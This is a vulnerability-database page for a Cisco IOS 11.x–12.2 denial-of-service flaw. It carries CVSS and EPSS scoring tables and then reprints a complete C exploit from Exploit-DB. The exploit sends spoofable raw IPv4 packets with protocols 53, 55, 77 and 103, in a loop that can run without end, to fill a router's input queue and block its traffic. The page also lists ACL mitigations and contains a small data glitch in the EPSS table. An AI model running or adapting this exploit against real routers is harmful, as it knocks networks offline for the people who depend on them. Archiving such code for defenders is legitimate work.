CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to an interface on the device, causing the input queue on that interface to be marked as full.
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.8
AV:N/AC:L/Au:N/C:N/I:N/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
6.79%
–
–
2022-04-03
–
–
6.79%
–
–
2022-05-22
–
–
6.79%
–
–
2023-03-12
–
–
–
82.01%
–
2024-01-07
–
–
–
79.9%
–
2024-06-02
–
–
–
79.9%
–
2024-12-08
–
–
–
80.7%
–
2024-12-22
–
–
–
80.51%
–
2025-01-19
–
–
–
80.51%
–
2025-03-18
–
–
–
–
21.79%
2025-03-30
–
–
–
–
24.63%
2025-03-30
–
–
–
–
24.63,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Publication date : 2003-07-20 22h00 +00:00 Author : Martin Kluge EDB Verified : Yes
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge (martin@elxsi.de) */
/* */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* */
/* This exploit uses the bug in recent IOS versions to stop router */
/* from processing traffic once the input queue is full. */
/* */
/* */
/* Use access control lists as described in the CISCO advisory to */
/* protect your cisco routers: */
/* */
/* access-list 101 deny 53 any any */
/* access-list 101 deny 55 any any */
/* access-list 101 deny 77 any any */
/* access-list 101 deny 103 any any */
/* */
/* This code was only tested on linux, no warranty is or will be */
/* */
/* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number> */
/* Source IP: Your source IP (or a spoofed source IP) */
/* Destination IP: The IP of the vulnerable cisco router */
/* Hops: The number of hops between you and the router, */
/* the time to live (ttl) should be 0 when the packet */
/* is received by the cisco router. */
/* Number: Number of packets to send (0 = loop) */
/* provided. */
/*******************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#define DEBUG
#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif
/* IPv4 header */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};
char proto[] = {53,55,77,103};
/* Prototypes */
int in_cksum (unsigned short *, int, int);
/* Main function */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;
unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;
unsigned char *buf;
/* Check command line args */
if(argc != 5) {
fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
return(EXIT_FAILURE);
}
src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);
if(count == 0) { loop=1; count=1; }
#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif
/* Open a raw socket */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}
/* Build the IPv4 header */
ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
ipv4_hdr.type_service = 0x10;
#ifdef OSTYPE_BSD
ipv4_hdr.packet_len = 0x14 + len;
ipv4_hdr.fragment = 0x4000;
#else
ipv4_hdr.packet_len = htons(0x14 + len);
ipv4_hdr.fragment = htons(0x4000);
#endif
ipv4_hdr.time_live = hops;
ipv4_hdr.src_ip.s_addr = src_ip;
ipv4_hdr.dst_ip.s_addr = dst_ip;
while(n < count) {
/* Seed the random generator */
if(gettimeofday(&seed, NULL) == -1) {
fprintf(stderr, "Error: Cannot seed the random generator.\n");
return(EXIT_FAILURE);
}
srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));
ipv4_hdr.protocol = proto[random() % 0x4];
#ifdef DEBUG
printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
#endif
ipv4_hdr.ident = htons(random() % 0x7fff);
/* Calculate checksum */
ipv4_hdr.sum = 0x0000;
ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);
#ifdef DEBUG
printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
#endif
buf = malloc(0x14 + len);
memset(buf, '\0', 0x14 + len);
memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
0x14 + len);
#ifdef DEBUG
printf("DEBUG: ");
for(i=0; i < 0x14 + len; i++)
printf(" %02x", buf[i]);
printf("\n");
#endif
memset(&sin, '\0', sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = dst_ip;
bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr));
#ifdef DEBUG
printf("DEBUG: Wrote %i bytes.\n", bytes);
#endif
if(loop != 1) n++;
free(buf);
}
close(fd);
return(EXIT_SUCCESS);
}
int in_cksum(unsigned short *addr, int len, int csum) {
register int sum = csum;
unsigned short answer = 0;
register unsigned short *w = addr;
register int nleft = len;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w<<8);
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
// milw0rm.com [2003-07-21]